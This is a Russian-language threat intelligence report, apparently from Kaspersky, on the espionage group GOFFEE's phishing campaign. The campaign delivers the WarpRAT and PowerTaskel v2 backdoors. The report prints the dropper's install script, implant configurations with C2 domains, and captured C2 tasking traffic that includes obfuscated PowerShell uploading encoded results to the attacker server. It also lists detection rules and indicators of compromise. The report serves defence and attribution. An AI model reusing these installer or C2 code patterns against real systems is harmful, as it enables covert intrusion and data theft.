Введение
Киберпреступная APT-группа GOFFEE (также известная как Paper Werewolf) совершает атаки на организации в РФ как минимум с начала 2022 года. Ее отличают хорошо спланированные операции, направленные на узкий круг целей, длительное присутствие в инфраструктуре жертвы, высокая скрытность и постоянно меняющийся арсенал утилит, техник, тактик и процедур, используемых для достижения поставленных задач.
Эта статья — часть нашего непрерывного исследования деятельности GOFFEE. В ней показана эволюция арсенала группы, в частности переход к новому компактному PowerShell-бэкдору (модифицированному агенту для пентест-фреймворка Mythic) совместно с бинарным троянцем удаленного доступа WarpRAT. Оба инструмента удалось связать через общую управляющую инфраструктуру (C2), что позволило с высокой степенью уверенности отнести их к одной APT-группе.
В ходе исследования мы проанализировали атаки группы, зафиксировали изменения в ее инструментарии и расширение инфраструктуры под новые кампании. Также была восстановлена полная цепочка атаки: от вектора первоначального проникновения до эксфильтрации данных.
Технические детали
Профиль группы
Характерные черты GOFFEE — высокий уровень активности: по нашей телеметрии, количество жертв в ходе этой кампании уже превысило 100 организаций. Также следует отметить частые изменения инфраструктуры (фактически для каждой кампании), использование целевого фишинга, обширный арсенал инструментов, его регулярное обновление или замена. Кроме того, группа применяет средства автоматизации при подготовке атак, в том числе на базе ИИ. Из-за постоянной смены тактик, техник и ПО со стороны GOFFEE непрерывный мониторинг деятельности этой группы необходим для своевременного обнаружения новых кампаний.
Основная мотивация группы — кибершпионаж. При этом атакующие способны развернуть любое вредоносное ПО в скомпрометированной корпоративной среде, что потенциально позволяет им решать и другие задачи — такие как вымогательство, кража средств или скрытый майнинг.
Ранее мы установили связь этой группы с другой APT-группой — HeartlessSoul. Со средней степенью уверенности можно заключить, что за этими двумя группами стоят одни и те же атакующие, однако их инструментарий существенно различается.
Начальный вектор распространения
Как упоминалось выше, основной метод распространения для этой группы — целевой фишинг. В марте 2026 года мы зафиксировали кампанию, в которой атакующие рассылали письма, содержащие PDF-файлы с вредоносными ссылками:
Приложенный PDF-файл содержит поддельное уведомление о том, что версия Acrobat Reader устарела и требуется обновление. Это реальный PDF-документ, внутри которого отображено фальшивое сообщение, стилизованное под системное уведомление об обновлении Acrobat Reader. В документе имеется кнопка «Установить обновление», которая перенаправляет пользователя по следующей вредоносной ссылке:
|
1 |
hxxps://ntpluck[.]online/29mNqbkQB96clqjJMRsdVKa94ILLxbFclUe3wf4KSx0rRPtI9M/download/eeab4aec6ad3b271c303d927db55de273bbca008ebf00e06898336c6f3010296 |
Бинарная вредоносная нагрузка
Переход по ссылке приводит к загрузке вредоносного ZIP-архива с оригинальным именем Adobe_Reader_RU.zip (MD5: 2cee7ab63de71482e8e928403d383af4). Вредоносный архив содержит единственное вложение — исполняемый файл с именем Adobe_Acrobat_Reader_Plugin_ru.exe (MD5: 2e8170e2508d629cff5501333b006bf4).
Этот исполняемый файл является вредоносным дроппером. Он был создан при помощи Inno Setup версии 6.7.0 (Unicode) и содержит три файла:
adbp.exe— вредоносный исполняемый файл;Требование.pdf— файл-обманка;install_script.iss— установочный скрипт с инструкциями для Inno Setup.
|
1 2 3 4 5 6 7 8 |
... [Files] Source: "{app}\adbp.exe"; DestDir: "{app}"; Flags: ignoreversion Source: "{src}\Требование.pdf"; DestDir: "{src}"; Flags: ignoreversion [Run] Filename: "{app}\adbp.exe"; Flags: skipifsilent nowait Filename: "{src}\Требование.pdf"; Flags: shellexec skipifsilent nowait ... |
Как следует из установочного скрипта, инсталлятор запускает вредоносный исполняемый файл и сразу после этого открывает PDF-файл-обманку.
Файл-обманка — это русскоязычный документ, названный «ОФИЦИАЛЬНЫЙ ЗАПРОС о предоставлении сведений о потребности в особочистой химической продукции» (MD5: 2141e8b1b0be2bad339a8a16b024bd32). Он предназначен для того, чтобы убедить пользователя, будто он обращается к легитимным источникам.
Первая страница документа приведена далее.
Исполняемый файл adbp.exe является вредоносной программой WarpRAT. Группа GOFFEE создала множество образцов WarpRAT для разных кампаний. Данный экземпляр имел следующие параметры:
|
1 2 3 4 5 6 7 8 9 10 11 12 |
{ "C2_port": 443, "useSSL": true, "sleepTime": 314, "buildId": "3d0391a4-de3e-4322-ba67-5777c630b6a2", "objName": "sum/M8suINj3ZFi22GMAUdCJH639vDrI2G4zdTWm2rpE5plxsr17Eg", "useAntiVM": 1, "C2": "ntpsum[.]online", "UA": "", "method": "POST", "sleepTime_rand": 15 } |
На момент нашего исследования C2-сервер этого образца (ntpsum[.]online) был активен, что позволило нам записать трафик между вредоносным образцом и командным сервером. Часть этого трафика приведена далее.
Запросы закодированы с помощью base64, их содержимое было описано в 2025 году. В данном образце были обнаружены незначительные изменения — он два раза передал в запросе поле buildID.
- build id (указан дважды)
- IPv4 адреса
- Название OS (Windows)
- Битность OS
- NetBIOS-имя машины
- Имя пользователя
- Имя домена
- Process ID
- Путь к импланту
- Захардкоженная версия импланта: 1.1.1.1.
Вредоносный файл (MD5: 7b3bd2903f30597499bf8dc717918bb3) поддерживает 4 команды, которые уже приводили ранее наши коллеги:
- 0x45 — установить задержку между запросами;
- 0x54 — выполнить команду через
cmd.exe /c; - 0x56 — выгрузить файл с хоста на C2-сервер;
- 0x57 — загрузить файл с C2-сервера на хост.
В ходе выполнения вредоносного скрипта в изолированном окружении мы записали две команды, полученные имплантом от C2-сервера.
tasklistsysteminfo
PowerShell-бэкдор — обновленный вариант PowerTaskel
Мы смогли установить связь между этой версией WarpRAT и модифицированным PowerShell-агентом Mythic, который был ранее описан в нашем отчете на Kaspersky Threat Intelligence Portal (TIP) «MythicAcademic: A Campaign Targeting Russian Academic Institutions» (доступен клиентам сервиса).
В ходе текущего исследования был также обнаружен образец WarpRAT (оригинальное имя mssp.exe, MD5: b891c2cc2cb54aadace88d77f9e84351) со следующими настройками.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
{ "C2_port": 80, "useSSL": true, "sleepTime": 10, "buildId": "3b27d598-d7a3-4101-839f-2a00cfd1bb26", "useCustomProxy": 0, "objName": "data", "useAntiVM": 1, "C2": "validsslcheck[.]com", "UA": "", "method": "POST", "sleepTime_rand": 23 } |
Командный центр этого образца — validsslcheck[.]com.
Также нам удалось обнаружить PowerShell-бэкдор для фреймворка Mythic (оригинальное имя
upd1.ps1, MD5: 7c24242ae5ca2eded6aa40dbd680d45e), который имел тот же командный центр.
Этот PowerShell-бэкдор — простая вредоносная утилита, предназначенная для взаимодействия с Mythic-сервером и выполнения полученных от него PowerShell-команд. Похожий бэкдор, известный как PowerTaskel, был описан нами в 2025 году.
Поскольку оригинальный PowerTaskel последний раз был обнаружен в реальных атаках в феврале этого года, мы считаем, что вновь обнаруженный PowerShell-агент для Mythic является новой версией PowerTaskel — для удобства будем именовать его PowerTaskel v2.
Таким образом, два различных бэкдора имеют общий командный центр — validsslcheck[.]com. На этом основании мы относим оба вредоносных инструмента к одной APT-группе — GOFFEE.
Несмотря на общий командный центр, эти бэкдоры используют разные URL-пути: data для бинарного импланта (WarpRAT) и /validate/nqr75PW93bLwapeasikg/cert/online для PowerShell-импланта (PowerTaskel v2). Различаются и заголовки User-Agent: бинарный имплант отправляет запрос с пустым заголовком, а PowerShell-имплант — с заголовком Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36.
Нам удалось записать коммуникацию между PowerTaskel v2 и командным центром. Как и в случае с бэкдором WarpRAT, все запросы PowerTaskel v2 закодированы при помощи Base64. Сервер также отвечает сообщениями в этой кодировке.
Начальный запрос импланта содержит единственное сообщение — checkin:
-
1da2b3cc7-be36-4301-a4df-32d215d1d1e2{"action":"checkin","uuid":"da2b3cc7-be36-4301-a4df-32d215d1d1e2"}
(«da2b3cc7-be36-4301-a4df-32d215d1d1e2» — захардкоженный UUID бэкдора).
Сервер отвечает сообщением типа success:
-
1da2b3cc7-be36-4301-a4df-32d215d1d1e2{"id":"0dbe6f52-ea02-47be-a73e-d3ad3e514650","status":"success","action":"checkin"}
Во втором запросе имплант запрашивает задание, отправляя сообщение типа get_tasking:
-
10dbe6f52-ea02-47be-a73e-d3ad3e514650{"action":"get_tasking","tasking_size":1}
(здесь имплант уже использует сессионный идентификатор, полученный от С2 на предыдущем шаге).
Сервер отвечает пустым ответом:
-
10dbe6f52-ea02-47be-a73e-d3ad3e514650{"tasks":[],"action":"get_tasking"}
К сожалению, в ходе выполнения этого образца в изолированном окружении нам не удалось получить какие-либо «полезные» команды с C2. Однако другой образец PowerTaskel v2 (с иным командным центром) позволил записать более интересный трафик.
Начальный запрос импланта содержал обращение типа get_tasking:
-
18e4ed6ee-970b-4853-8ea9-69237665d476{"action":"get_tasking","tasking_size":1}
Сервер вернул команду sleep:
-
18e4ed6ee-970b-4853-8ea9-69237665d476{"tasks":[{"timestamp":1776241517,"command":"sleep","parameters":"{\"command\": \"$OVzLadr=\\\"15\\\";\\ntry {\\n $RWkDBqIa = $null;\\n $JmgvnGf = \\\"success\\\";\\n}\\ncatch {\\n $RWkDBqIa = $_;\\n $JmgvnGf = \\\"error\\\";\\n}\\n\\nstart-sleep -s $OVzLadr;\\n\\n$EibTBgdbtlB = [pscustomobject]@{\\n task_id = $UyLtwaO;\\n user_output = ($RWkDBqIa | out-string);\\n status = $JmgvnGf;\\n completed = $true;\\n};\\n$TkyUiqhFg = [pscustomobject]@{\\n action=\\\"post_response\\\";\\n responses=@($EibTBgdbtlB);\\n};\\n$DrNBvPc = ($TkyUiqhFg | convertto-json -compress -depth 10).tostring();\\n$bOofrmEefSN = [convert]::tobase64string([system.text.encoding]::utf8.getbytes($mFFPzQ+ $DrNBvPc));\\n$xlvPkDG = $AFpilP.uploadstring($vEnrCDoTX+$XEtItTZt, $bOofrmEefSN);\\nremove-variable RWkDBqIa,JmgvnGf,EibTBgdbtlB,TkyUiqhFg,DrNBvPc,bOofrmEefSN,xlvPkDG;\"}","id":"89ad464b-4002-4ddc-8d85-7fc8b6e49313"}],"action":"get_tasking"}
Далее, после паузы, имплант повторил запрос get_tasking, и сервер прислал команду на сбор информации о системе, после чего обмен продолжился.
Как видно из примеров выше, сервер передает не только название команды, но и код, необходимый для ее выполнения.
Жертвы
Согласно нашей телеметрии, в ходе исследования мы обнаружили около 120 жертв в Российской Федерации, несколько — в странах СНГ и единичные — в ЕС. Атаки на цели в странах Евросоюза носят случайный характер.
Почти все спирфишинговые письма и файлы-приманки, использованные в этой кампании, содержали русский текст. Эта лингвистическая улика в сочетании с данными телеметрии позволила нам сделать вывод в том, что основные цели группы находятся преимущественно в РФ. Большая часть целей принадлежала к машиностроению, производству и государственному сектору.
Атрибуция
С высокой степенью уверенности эту кампанию можно связать с другими ранее описанными кампаниями GOFFEE на основании следующих сходств.
- Схожесть кода бинарных имплантов. Ниже приведены две процедуры, извлеченные из различных бинарных образцов WarpRAT: один образец был описан нашими коллегами и атрибутирован группе GOFFEE, а второй относится к кампании, описанной в этой статье.
- Схожесть кода PowerShell-имплантов. Ниже приведены начальные фрагменты кода двух имплантов PowerTaskel: первый был исследован нами ранее (отчет доступен только на TIP), а второй относится к описанной здесь кампании.


Фрагмент кода образца 29690F86D68F34009CC2D9C0D2E28EEA, описанного в наших предыдущих отчетах Фрагмент кода образца F5194119A62590D7DDDC1F677FB470D0 из этой кампании - Характерным признаком является также типичный для кампаний GOFFEE набор техник, включая спирфишинг в качестве вектора первоначального доступа, использование отдельных доменов для каждой кампании, активное применение серверов обратного проксирования для сокрытия инфраструктуры командных центров, долговременное присутствие в скомпрометированной сети и специально отобранный круг жертв (в основном это государственные учреждения и промышленные предприятия РФ).
Выводы
В данной статье представлены результаты нашего анализа последних кампаний группы GOFFEE. Мы описали новую для них технику первоначального доступа. В рассматриваемых инцидентах злоумышленники в основном полагались на тщательно подготовленные фишинговые письма и методы социальной инженерии. Ранее для доставки вредоносных файлов группа использовала подгрузку удаленного шаблона с макросом либо формат XLL.
Нами также выявлено развертывание двух различных бэкдоров: первый — широко известный бинарный WarpRAT (известный также как EchoGather RAT), второй — легкий Mythic-агент на базе PowerShell, который, по нашей оценке, представляет собой эволюцию бэкдора PowerTaskel (мы условно назвали эту версию PowerTaskel v2). Изначально уверенно отнести этот бэкдор к GOFFEE не представлялось возможным (его применение фиксировалось в кампании MythicAcademic), однако обнаружение общей инфраструктуры С2-серверов позволило установить эту связь.
Подводя итог, можно отметить, что группа GOFFEE продолжает развивать и модифицировать свои техники, тактики, процедуры и инструменты, увеличивая число жертв, повышая точность атак и адаптируя их под каждую отдельную кампанию. Эта APT‑группа представляет серьезную угрозу. Мы будем продолжать мониторинг ее активности и своевременно информировать наших клиентов о всех обнаруженных изменениях.
Детектирование решениями «Лаборатории Касперского»
Защитные решения «Лаборатории Касперского», такие как Kaspersky Endpoint Detection and Response Expert (далее — KEDR Expert), успешно обнаруживают вредоносную активность в рамках описанных атак. Рассмотрим это подробнее.
В частности, активность, связанную с нетипичным запуском командного интерпретатора cmd.exe из программы, входящей в состав офисного пакета Microsoft Office, KEDR Expert детектирует с помощью правил suspicious_process_spawned_by_office_app и suspicious_child_process_by_trusted_process.
Кроме того, создание подозрительного исполняемого файла легитимным процессом, которое может свидетельствовать о доставке вредоносной нагрузки, KEDR Expert детектирует с помощью правила dropping_executable_file_by_trusted_process.
Также нетипичная активность, связанная с запуском исполняемого файла неподписанным файлом с расширением .tmp из временного каталога (что может свидетельствовать о подготовке к запуску вредоносного ПО) детектируется KEDR Expert с помощью такого правила: start_of_suspicious_process_from_parent_temp_file.
Для комплексного анализа описанной вредоносной активности также может быть использовано решение Kaspersky Cloud Sandbox, входящее в состав Kaspersky Threat Analysis. Оно предоставляет детальную информацию о поведении исследуемых вредоносных файлов и, в частности, позволяет выявлять индикаторы компрометации на основе поведенческого анализа.
На рисунке ниже представлен интерфейс Kaspersky Cloud Sandbox, демонстрирующий результаты динамического анализа одного из образцов WarpRAT.
По результатам динамического анализа видно, что исследуемый образец пытается установить сетевое соединение с C2-сервером, а также проводит разведку окружения на наличие артефактов, связанных с выполнением в песочнице.
Чтобы более подробно проанализировать всю цепочку сетевого взаимодействия, можно перейти на вкладку «Действия в сети».
Дополнительную информацию об обнаруженном вредоносном домене можно найти в нашем сервисе Kaspersky Threat Lookup, входящем в Kaspersky Threat Intelligence. Например, он позволяет получить сведения о других вредоносных образцах, связанных с этим доменом.
Выявлять вредоносную сетевую активность рассмотренных образцов путем поиска аномалий и характерных паттернов в трафике можно с помощью Kaspersky Anti Targeted Attack (KATA) с модулем NDR.
В частности, сетевая активность WarpRAT по протоколу HTTP обнаруживается правилом Trojan.Mythic.HTTP.C&C.
Индикаторы компрометации
* Дополнительные индикаторы компрометации и правила YARA для детектирования активности группы GOFFEE доступны клиентам сервиса аналитических отчетов об APT-угрозах. Для получения более подробной информации свяжитесь с нами по адресу intelreports@kaspersky.com.
WarpRAT (бинарный бэкдор)
1E958B4F40358763ED8AC283A031BF23
042DDE30E9F5B4E4A85D04FF0F7587EA
2C334D7F133CA21F173B1065F4041B4A
4C9E6966D9E952C43F4A14772A7B93AC
6804C66E4085E8303CC54246F6EE324D
70EAC0580313E84E6E47AF9FD845A97E
5C2B5CBA8592CAAC3942D8FE804CD40A
9587EEB02E19CBC2715E27FCA8BB5103
7BAFCEF2DADB3EFEE18E3F75FFB9C9FE
898FB2CA5B2E32754F62635FDA825618
A0007C8ABCBEFA28C00DFB534D05D367
BFAF3C422B5F4FCF7E05D743C8D5FCBA
D509BAA79304E6191846E2419AB65220
EA01F5BB5BBAB2D66D78365ABFB2127E
77FC8C9B7C002940C569058661F64398
PowerTaskel v2 (PowerShell-бэкдор)
6C6F04AB0CD6F172978966EBF782A0F9
1E2B7964871BC78D9D21A253492DF937
73C8BA65CE9E9F06141AE5A5D50CBFF2
960F3A159E8A739B618887EBF8CC925F
36D6A2C461C02C240882F11C8D7C9002
7E107C6F89246002FDC5DB759985A86F
2651E26D700E648C86C167B6482BF0B6
45981F2B70CA73A86A01771E07D98843
3638326B7338C90ECBF5A119432CDB2A
A9D56109F75E165604C29F5355F43E44
AA3D88F6FD0075CEF2F90AFB90D2A4A8
BF6FAACE50D788DEA1FCE23496902636
C53F6A52910C0ADF5915F36B8104862E
DE9519524499988CCB99F033CCEC60C4
Вредоносные домены
timemirror[.]online
bellwitch[.]online
timecheck[.]site
ntpcheck[.]online
ntpverify[.]online
timeget[.]online
timefetch[.]online
easytrns[.]com
ntpsync[.]online
syncheaven[.]online
syncpack[.]online
sslfix[.]online
sslchck[.]online
ntp[.]report
mysitte[.]online
sddfghj[.]com
ntpfix[.]online
sslvalid[.]online


















APT-группа GOFFEE продолжает атаки на организации в РФ, распространяя два бэкдора через целевой фишинг